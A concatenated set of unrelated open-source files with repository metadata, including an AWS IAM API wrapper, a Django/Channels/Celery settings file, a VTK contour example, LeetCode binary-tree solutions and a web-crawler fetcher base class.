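# bindings. The NSIP and credentials below are placeholders, not real values.
if __name__ == "__main__":
    from nssrc.com.citrix.netscaler.nitro.service.nitro_service import nitro_service
    client = nitro_service("10.0.0.1", "https")  # placeholder NetScaler IP
    client.login("nsroot", "nsroot")  # placeholder credentials
    for binding in vpnglobal_auditnslogpolicy_binding.get(client) or []:
        print(binding.policyname, binding.priority)
    client.logout()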
|
[
"[email protected]"
] | |
068bfe1d684059513b8ff1b15160ec145471ffc3
|
44064ed79f173ddca96174913910c1610992b7cb
|
/Second_Processing_app/temboo/Library/Amazon/IAM/GetGroupPolicy.py
|
f85f2b09ae61777531adae6278c6723fdd2e9698
|
[] |
no_license
|
dattasaurabh82/Final_thesis
|
440fb5e29ebc28dd64fe59ecd87f01494ed6d4e5
|
8edaea62f5987db026adfffb6b52b59b119f6375
|
refs/heads/master
| 2021-01-20T22:25:48.999100 | 2014-10-14T18:58:00 | 2014-10-14T18:58:00 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,397 |
py
|
# -*- coding: utf-8 -*-
###############################################################################
#
# GetGroupPolicy
# Retrieves the specified policy document for the specified group.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class GetGroupPolicy(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the GetGroupPolicy Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
Choreography.__init__(self, temboo_session, '/Library/Amazon/IAM/GetGroupPolicy')
def new_input_set(self):
return GetGroupPolicyInputSet()
def _make_result_set(self, result, path):
return GetGroupPolicyResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return GetGroupPolicyChoreographyExecution(session, exec_id, path)
class GetGroupPolicyInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the GetGroupPolicy
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AWSAccessKeyId(self, value):
"""
Set the value of the AWSAccessKeyId input for this Choreo. ((required, string) The Access Key ID provided by Amazon Web Services.)
"""
InputSet._set_input(self, 'AWSAccessKeyId', value)
def set_AWSSecretKeyId(self, value):
"""
Set the value of the AWSSecretKeyId input for this Choreo. ((required, string) The Secret Key ID provided by Amazon Web Services.)
"""
InputSet._set_input(self, 'AWSSecretKeyId', value)
def set_GroupName(self, value):
"""
Set the value of the GroupName input for this Choreo. ((required, string) The name of the group to return.)
"""
InputSet._set_input(self, 'GroupName', value)
def set_PolicyName(self, value):
"""
Set the value of the PolicyName input for this Choreo. ((required, string) Name of the policy document to get.)
"""
InputSet._set_input(self, 'PolicyName', value)
def set_ResponseFormat(self, value):
"""
Set the value of the ResponseFormat input for this Choreo. ((optional, string) The format that the response should be in. Valid values are "xml" (the default) and "json".)
"""
InputSet._set_input(self, 'ResponseFormat', value)
class GetGroupPolicyResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the GetGroupPolicy Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. (The response from Amazon.)
"""
return self._output.get('Response', None)
class GetGroupPolicyChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return GetGroupPolicyResultSet(response, path)
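

# Usage sketch (not part of the generated SDK): execute the Choreo through a
# Temboo session. The account name, app key, and AWS credentials below are
# placeholders, not real values.
if __name__ == "__main__":
    from temboo.core.session import TembooSession
    session = TembooSession("ACCOUNT_NAME", "APP_KEY_NAME", "APP_KEY_VALUE")
    choreo = GetGroupPolicy(session)
    inputs = choreo.new_input_set()
    inputs.set_AWSAccessKeyId("YOUR_AWS_ACCESS_KEY_ID")
    inputs.set_AWSSecretKeyId("YOUR_AWS_SECRET_KEY")
    inputs.set_GroupName("Admins")
    inputs.set_PolicyName("AdminPolicy")
    results = choreo.execute_with_results(inputs)
    print(results.get_Response())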
|
[
"[email protected]"
] | |
44153f43db578ddeaf085d737762fe112938c9e7
|
eb79c567ca500b39e268eb270c792688a20b1f08
|
/generatePage.py
|
4c7ad31a6e6ca54e0c7c6645be1c034961e043c9
|
[] |
no_license
|
RickeyEstes2/arxiv-equations
|
db746ba993a2a6ad9907594e15e6148acd52ac85
|
93047961d9de04d7aa79635a6f59a8680242637b
|
refs/heads/master
| 2023-03-16T12:19:41.378386 | 2018-11-26T05:20:06 | 2018-11-26T05:20:06 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,666 |
py
|
#!/usr/bin/env python
# This script will read in a pickle that includes extracted metadata and
# equations from an article, and general yaml (with front end matter) to
# render into a page.
import pickle
import operator
import frontmatter
import os
import sys
from helpers import get_equation_counts
input_pkl = sys.argv[1]
# We should be in directory where script is running
here = os.path.abspath(os.path.dirname(__file__))
os.chdir(here)
posts = '%s/_posts' % here
if not os.path.exists(posts):
    os.mkdir(posts)
# result.keys()
# dict_keys(['equations', 'metadata', 'inputFile', 'latex', 'uid']
################################################################################
# ARTICLE TEMPLATE
################################################################################
# Don't continue unless we have metrics file
if not os.path.exists(input_pkl):
print('Cannot find metrics file, exiting')
sys.exit(1)
result = pickle.load(open(input_pkl,'rb'))
template = frontmatter.load('%s/templates/article-template.md' %here)
template.content = result['metadata']['summary']
# Add metadata to template, only specific fields
template.metadata['id'] = result['metadata']['id']
template.metadata['updated'] = result['metadata']['updated']
template.metadata['published'] = result['metadata']['published']
# Parse year, month, day
month = result['metadata']['published_parsed'].tm_mon
day = result['metadata']['published_parsed'].tm_mday
year = result['metadata']['published_parsed'].tm_year
template.metadata['published_month'] = month
template.metadata['published_day'] = day
template.metadata['published_year'] = year
template.metadata['title'] = result['metadata']['title']
template.metadata['search_query'] = result['metadata']['title_detail']['base']
template.metadata['title_detail'] = result['metadata']['title_detail']['value']
template.metadata['authors'] = result['metadata']['authors']
template.metadata['comment'] = result['metadata']['arxiv_comment']
# Parse links into list
links = []
for link in result['metadata']['links']:
links.append(link['href'])
template.metadata['links'] = links
template.metadata['category'] = result['metadata']['arxiv_primary_category']['term']
template.metadata['topic'] = result['metadata']['arxiv_primary_category']['term']
# Tags
tags = []
for tag in result['metadata']['tags']:
tags.append(tag['term'])
template.metadata['tags'] = tags
template.metadata['pdf_url'] = result['metadata']['pdf_url']
template.metadata['arxiv_url'] = result['metadata']['arxiv_url']
# Equations
raw = [e.replace('\\\\','\\') for e in result['equations']]
# Let's count instead
equations = get_equation_counts(raw)
# Get total count to calculate percent
total = 0
for e,count in equations.items():
total += count
# Let's make total width 900px
# Sort by count ascending; reversed below so the list is greatest-first
equation_list = []
for item in sorted(equations.items(), key=operator.itemgetter(1)):
percent = item[1] / total
pixels = round(percent * 900, 0)
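    # e.g. an equation seen 45 times out of 300 total: percent = 0.15,
    # pixels = round(0.15 * 900, 0) = 135.0, displayed percent = 15.0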
equation_list.append({'equation': item[0],
'count': item[1],
'pixels': pixels,
'percent': round(100*percent,2) })
# Greatest to least
equation_list.reverse()
template.metadata['equations'] = equation_list
template.metadata['equations_total'] = total
# Write to File
output_dir = os.path.abspath('%s/_posts/%s/%s' % (here, year, month))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
outfile = os.path.join(output_dir, '%s-%02d-%02d-%s.md' %(year, month, day, result['uid'].replace('/','-')))
with open(outfile, 'w') as filey:
filey.writelines(frontmatter.dumps(template))
|
[
"[email protected]"
] | |
3148c6e92aa0af98497ad72eadb37962a9b50cd9
|
92065e3b378edc8e0570e4295aca0968de3c852d
|
/rosalind_frmt.py
|
c3178a9ffd4e87839daefb1e149757e2ceb3005d
|
[] |
no_license
|
sunhuaiyu/rosalind
|
18dc9fa78aaa84b478b112089a3b94d0f442b1bb
|
7181cc9215d3ea0b5ad9d0811c00e01fd9f20b1c
|
refs/heads/master
| 2020-04-04T17:53:17.437595 | 2019-04-11T17:03:52 | 2019-04-11T17:03:52 | 25,007,403 | 5 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 404 |
py
|
# sun.huaiyu
# gbk
from Bio import Entrez, SeqIO
Entrez.email = '[email protected]'
f = open('rosalind_frmt.txt')
ids = f.readline().split()
handle = Entrez.efetch(db='nucleotide', id=[', '.join(ids)], rettype='fasta')
records = list(SeqIO.parse(handle, 'fasta'))
shortest = sorted(records, key=lambda x: len(x.seq))[0]
f = open('rosalind_frmt_ans.txt', 'wt')
f.write(shortest.format('fasta'))
f.close()
|
[
"[email protected]"
] | |
3ec6354d03c41e1a6cb36925667ad36dcc433e98
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_issue.py
|
00ab7aacb2f25fe5d71d73b0fb32f899b9120904
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 823 |
py
|
# class header
class _ISSUE():
def __init__(self,):
self.name = "ISSUE"
self.definitions = [u'a subject or problem that people are thinking and talking about: ', u'most important in what is being discussed: ', u'to make something seem more important than it should be, or to argue about it: ', u'to disagree strongly: ', u'to have difficulty or disagreement with someone or something: ', u'a set of newspapers or magazines published at the same time or a single copy of a newspaper or magazine: ', u'An issue of shares is a time when a company gives people the chance to buy part of it or gives extra shares to people who already own some.']
self.parents = []
		self.children = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
|
[
"[email protected]"
] | |
4d48ca0b1e607e8bfce731a23c9d6dde8dd48770
|
a680b681210a070ff6ac3eab4ed3ea5a125991d6
|
/spider/instances/inst_fetch.py
|
487fe1d57881e518171e2bb08fc2984b632fe21c
|
[
"BSD-2-Clause"
] |
permissive
|
moonbirdxp/PSpider
|
bb6da1de6a78d86ee8704b6eb8981773a1a31d8c
|
4d7238b4ebafd129ecc5dd1095ce1ece313945ec
|
refs/heads/master
| 2020-06-22T03:46:17.320420 | 2019-07-16T03:26:20 | 2019-07-16T04:44:17 | 197,624,496 | 0 | 0 |
BSD-2-Clause
| 2019-10-15T01:04:19 | 2019-07-18T16:48:09 |
Python
|
UTF-8
|
Python
| false | false | 1,711 |
py
|
# _*_ coding: utf-8 _*_
"""
inst_fetch.py by xianhu
"""
import time
import random
class Fetcher(object):
"""
class of Fetcher, must include function working()
"""
def __init__(self, sleep_time=0, max_repeat=3):
"""
constructor
:param sleep_time: default 0, sleeping time after a fetching
:param max_repeat: default 3, maximum repeat count of a fetching
"""
self._sleep_time = sleep_time
self._max_repeat = max_repeat
return
def working(self, priority: int, url: str, keys: dict, deep: int, repeat: int, proxies=None) -> (int, object, int):
"""
        working function; wrap the work in try/except and do not change the parameters or returns
:return fetch_state: can be -1(fetch failed), 0(need repeat), 1(fetch success)
:return content: can be any object, or exception information[class_name, excep]
        :return proxies_state: can be -1(unavailable), 0(return to queue), 1(available)
"""
time.sleep(random.randint(0, self._sleep_time))
try:
fetch_state, content, proxies_state = self.url_fetch(priority, url, keys, deep, repeat, proxies=proxies)
except Exception as excep:
fetch_state, content, proxies_state = (-1 if repeat >= self._max_repeat else 0), [self.__class__.__name__, str(excep)], -1
return fetch_state, content, proxies_state
def url_fetch(self, priority: int, url: str, keys: dict, deep: int, repeat: int, proxies=None) -> (int, object, int):
"""
fetch the content of a url, you must overwrite this function, parameters and returns refer to self.working()
"""
raise NotImplementedError
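

# Usage sketch (not part of PSpider itself): a concrete Fetcher that downloads
# pages with the third-party `requests` library. The class name and the
# 10-second timeout are illustrative assumptions.
class SimpleFetcher(Fetcher):

    def url_fetch(self, priority: int, url: str, keys: dict, deep: int, repeat: int, proxies=None) -> (int, object, int):
        import requests  # third-party dependency, assumed available
        resp = requests.get(url, proxies=proxies, timeout=10)
        resp.raise_for_status()
        # 1 = fetch success, content = page text, 1 = proxies still usable
        return 1, resp.text, 1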
|
[
"[email protected]"
] | |
ba8e796d0931eec1c2ee5edeb7c0e03f0475c60a
|
482b695d09d721d2d1731cf50e3928e058e44916
|
/src/Python/StructuredPoints/Vol.py
|
bd3d72e56d26d82c9969ed3d20b53525bd0b1dff
|
[
"Apache-2.0"
] |
permissive
|
numminorih/vtk-examples
|
b9d5c35f62dc287c6633b05ab4fb14033100bee8
|
2e3922a61cf4ef428c013d56d754742ff880b3cf
|
refs/heads/master
| 2023-07-29T05:56:23.235478 | 2021-09-07T22:58:41 | 2021-09-07T22:58:41 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,639 |
py
|
#!/usr/bin/env python
import vtk
def main():
colors = vtk.vtkNamedColors()
renderer = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(renderer)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
vol = vtk.vtkStructuredPoints()
vol.SetDimensions(26, 26, 26)
vol.SetOrigin(-0.5, -0.5, -0.5)
sp = 1.0 / 25.0
vol.SetSpacing(sp, sp, sp)
scalars = vtk.vtkDoubleArray()
scalars.SetNumberOfComponents(1)
scalars.SetNumberOfTuples(26 * 26 * 26)
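    # Sample the implicit sphere f(x, y, z) = x^2 + y^2 + z^2 - 0.4^2 on the
    # grid; the zero isosurface extracted by vtkContourFilter below is a
    # sphere of radius 0.4 centered at the origin.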
for k in range(0, 26):
z = -0.5 + k * sp
kOffset = k * 26 * 26
for j in range(0, 26):
y = -0.5 + j * sp
jOffset = j * 26
for i in range(0, 26):
x = -0.5 + i * sp
s = x * x + y * y + z * z - (0.4 * 0.4)
offset = i + jOffset + kOffset
scalars.InsertTuple1(offset, s)
vol.GetPointData().SetScalars(scalars)
contour = vtk.vtkContourFilter()
contour.SetInputData(vol)
contour.SetValue(0, 0.0)
volMapper = vtk.vtkPolyDataMapper()
volMapper.SetInputConnection(contour.GetOutputPort())
volMapper.ScalarVisibilityOff()
volActor = vtk.vtkActor()
volActor.SetMapper(volMapper)
volActor.GetProperty().EdgeVisibilityOn()
volActor.GetProperty().SetColor(colors.GetColor3d('Salmon'))
renderer.AddActor(volActor)
renderer.SetBackground(colors.GetColor3d('SlateGray'))
renWin.SetSize(512, 512)
renWin.SetWindowName('Vol')
# Interact with the data.
renWin.Render()
iren.Start()
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
373bef96a622b1cfeedf8d9879a96af87bfd9e46
|
f8e8e365c9cf58b61d72655bc2340baeaed5baff
|
/Leetcode/Python Solutions/Binary Trees/UnivaluedBinaryTree.py
|
3ed40370aac53df28bfef683b6d36e893ee4ed0e
|
[
"MIT"
] |
permissive
|
Mostofa-Najmus-Sakib/Applied-Algorithm
|
39a69f6b9ed113efe4a420d19cad79e0aa317637
|
bc656fd655617407856e0ce45b68585fa81c5035
|
refs/heads/master
| 2023-08-31T19:54:34.242559 | 2021-11-05T03:43:35 | 2021-11-05T03:43:35 | 412,263,430 | 0 | 0 |
MIT
| 2021-09-30T23:45:29 | 2021-09-30T23:45:25 | null |
UTF-8
|
Python
| false | false | 2,071 |
py
|
"""
LeetCode Problem:965. Univalued Binary Tree
Link: https://leetcode.com/problems/univalued-binary-tree/
Language: Python
Written by: Mostofa Adib Shakib
Two versions of the solution
Version 1(Recursive using DFS):
In this version of the solution we use a dfs helper method to compare every node in the true. If the value of every node is not equal to the
root node we return False. This method is faster as it doesn't iterative every node.
Version 2(Iteratively using In-Order traversal):
In this version of the solution we use a stack. We push all the left child of a node into the stack up until we reach a Null node.
If we reach a Null node and the stack is not empty then we pop an element from the stack and and compare it's value with the root node
if they are equal then we append it's right child to the stack or else we return False. This method is a bit slower as we are iterating over
all the left child of a node before comparing it's value with the root node.
"""
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
# Version 1(Recursion using DFS)
class Solution(object):
def isUnivalTree(self, root):
"""
:type root: TreeNode
:rtype: bool
"""
def dfs(root,val):
if not root: return True
return root.val == val and dfs(root.left,val) and dfs(root.right,val)
return dfs(root,root.val)
# Version 2(Iteratively using In-Order traversal)
class Solution(object):
def isUnivalTree(self, root):
"""
:type root: TreeNode
:rtype: bool
"""
if not root: return True
curr = root
stack = []
while True:
if curr is not None:
stack.append(curr)
curr = curr.left
elif stack:
curr = stack.pop()
if root.val != curr.val:
return False
curr = curr.right
else:
break
return True
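
# Illustrative usage sketch (editor's addition): define the TreeNode class from
# the commented stub above and check the univalued tree [1, 1, 1].
class TreeNode(object):
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None

root = TreeNode(1)
root.left = TreeNode(1)
root.right = TreeNode(1)
print(Solution().isUnivalTree(root))  # expected: True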
|
[
"[email protected]"
] | |
7c2f2a6315e31fdfcbb25564c9f2140caa632aab
|
c72cde3c84b4c3ed1180f5e88a30780a90a70075
|
/source/accounts/migrations/0004_auto_20191101_1520.py
|
150d17738d1a16ee4602fb5d52c475c89c795da5
|
[] |
no_license
|
Aisuluu1405/python_group_3_homework_49_Aisulu_Dzhusupova
|
a88187e34a71c282eedd08c2616c66a19daef356
|
6fbf0a57dfc85ebd8203142f6b903228c67b1051
|
refs/heads/master
| 2022-11-28T18:32:32.732140 | 2019-12-09T14:11:01 | 2019-12-09T14:11:01 | 211,069,782 | 0 | 0 | null | 2022-11-22T04:47:28 | 2019-09-26T11:09:26 |
Python
|
UTF-8
|
Python
| false | false | 590 |
py
|
# Generated by Django 2.2 on 2019-11-01 15:20
from django.db import migrations
def create_user_profiles(apps, schema_editor):
User = apps.get_model('auth', 'User')
UserProfile = apps.get_model('accounts', 'UserProfile')
for user in User.objects.all():
UserProfile.objects.get_or_create(user=user)
def drop_user_profiles(apps, schema_editor):
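    # Intentionally a no-op: reversing this migration leaves existing profiles in place.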
pass
class Migration(migrations.Migration):
dependencies = [
('accounts', '0003_auto_20191101_0536'),
]
operations = [
migrations.RunPython(create_user_profiles, drop_user_profiles)
]
|
[
"[email protected]"
] | |
94400f966a70ee4add2a8083778d5eb0fba7eaca
|
05857cd30669a914d69ce872141964a4e6b31edd
|
/sample.py
|
2cc30d2240966d3dfd725f69d94e80076a8fa628
|
[] |
no_license
|
EricSchles/test_naming
|
f61e0900835edbbd7f5054e1916e38647f460e9e
|
a9be0cc48c40b704c7970968458db3631c8116e2
|
refs/heads/master
| 2021-01-17T12:21:09.588993 | 2014-11-05T00:11:34 | 2014-11-05T00:11:34 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 233 |
py
|
class Foo:
    def __init__(self, first, second):
        self.first = first
        self.second = second

    def adder(self):
        return self.first + self.second

    def multiplier(self):
        return self.first * self.second
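
# Minimal usage example (editor's addition):
if __name__ == "__main__":
    f = Foo(2, 3)
    print(f.adder())       # 5
    print(f.multiplier())  # 6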
|
[
"[email protected]"
] | |
44dd986a455b97ff422c59570f460e119a19fc12
|
3496ead97ad993b8c32ff6f96cf3474110baef79
|
/thisisproject/settings.py
|
d7c2755ccda782a22425d6f608116a620dfddfd3
|
[] |
no_license
|
vpgrishkin/django-channels-celery-jokes
|
7e7d5b71110f14ef08c2e684ae89c39cd321b219
|
b617cc97e8f9ad0710f6bd6de122749263b28c18
|
refs/heads/master
| 2020-03-31T08:48:01.011142 | 2018-06-17T06:16:32 | 2018-06-17T06:16:32 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,276 |
py
|
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = "hzk=g8z3=*xds6zkaol*enq+^)b8_5knm6=gygewnc3yt3urg3"
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"channels",
"jokes.apps.JokesConfig",
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "thisisproject.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
]
},
}
]
WSGI_APPLICATION = "thisisproject.wsgi.application"
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": os.path.join(BASE_DIR, "db.sqlite3"),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator"
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = "/static/"
# Celery
CELERY_BROKER_URL = "redis://redis:6379/0"
CELERY_ACCEPT_CONTENT = ["json"]
CELERY_TASK_SERIALIZER = "json"
CELERY_RESULT_SERIALIZER = "json"
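# Celery beat: run jokes.tasks.get_random_joke every 15 seconds.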
CELERY_BEAT_SCHEDULE = {
"get_random_joke": {"task": "jokes.tasks.get_random_joke", "schedule": 15.0}
}
# Channels
ASGI_APPLICATION = "thisisproject.routing.application"
CHANNEL_LAYERS = {
"default": {
"BACKEND": "channels_redis.core.RedisChannelLayer",
"CONFIG": {"hosts": [("redis", 6379)]},
}
}
|
[
"[email protected]"
] | |
bebe9062b31f8a9800ce2d05f8bdc7ae7ac81e36
|
6ed034d0a5e239d7b0c528b287451409ffb4a494
|
/mmpose/core/camera/__init__.py
|
a4a3c5526560996791a85f0d84a72a66286486ca
|
[
"Apache-2.0"
] |
permissive
|
ViTAE-Transformer/ViTPose
|
8f9462bd5bc2fb3e66de31ca1d03e5a9135cb2bf
|
d5216452796c90c6bc29f5c5ec0bdba94366768a
|
refs/heads/main
| 2023-05-23T16:32:22.359076 | 2023-03-01T06:42:22 | 2023-03-01T06:42:22 | 485,999,907 | 869 | 132 |
Apache-2.0
| 2023-03-01T06:42:24 | 2022-04-27T01:09:19 |
Python
|
UTF-8
|
Python
| false | false | 232 |
py
|
# Copyright (c) OpenMMLab. All rights reserved.
from .camera_base import CAMERAS
from .single_camera import SimpleCamera
from .single_camera_torch import SimpleCameraTorch
__all__ = ['CAMERAS', 'SimpleCamera', 'SimpleCameraTorch']
|
[
"[email protected]"
] | |
497f1dde8d0a8091281fc01b4c148a70ba5404db
|
5c3ab4a045f6df4edb647e509ca7f79c9268a5a6
|
/src/tableau_api_lib/sample/__init__.py
|
b000487bafa8c5ea2044d58507c0cde5f83320c0
|
[
"MIT"
] |
permissive
|
divinorum-webb/tableau-api-lib
|
d1bafa5c876ce26c5884b6b1bc53c0969565c52b
|
99a1d3c2a4d7dc20d1c4a619d58cc756ace1db41
|
refs/heads/master
| 2023-04-04T22:52:37.753153 | 2022-10-15T11:51:45 | 2022-10-15T11:51:45 | 203,291,381 | 84 | 29 |
MIT
| 2023-03-29T13:40:22 | 2019-08-20T03:18:01 |
Python
|
UTF-8
|
Python
| false | false | 42 |
py
|
from .config_example import sample_config
|
[
"[email protected]"
] | |
b13bca55632de5a3c7d5819f798989c93fc5fbe1
|
98cd5ddf45a73aea64bbfac0c0104829d7231b81
|
/S - Grid Slide Square - Filled/info.py
|
3a06687be68f63f5b6e0b36197f1252211343cde
|
[] |
no_license
|
atheis4/ETC_Modes_Extra
|
42508d523cfe632a3335e29f6e1e40af91df231b
|
d0ce221562105382a7a73cc6d280f4ad0eabf6f3
|
refs/heads/master
| 2022-04-04T11:15:07.335910 | 2020-01-03T20:27:32 | 2020-01-03T20:27:32 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 261 |
py
|
name = "S - Grid Slide Square - Filled"
description = "Grid of oscillating filled squares with LFO-controlled sliding rows with animated color fade"
knob1 = "Slide LFO speed"
knob2 = "Slide LFO range"
knob3 = "Size"
knob4 = "Color"
released = "March 18 2019"
|
[
"[email protected]"
] |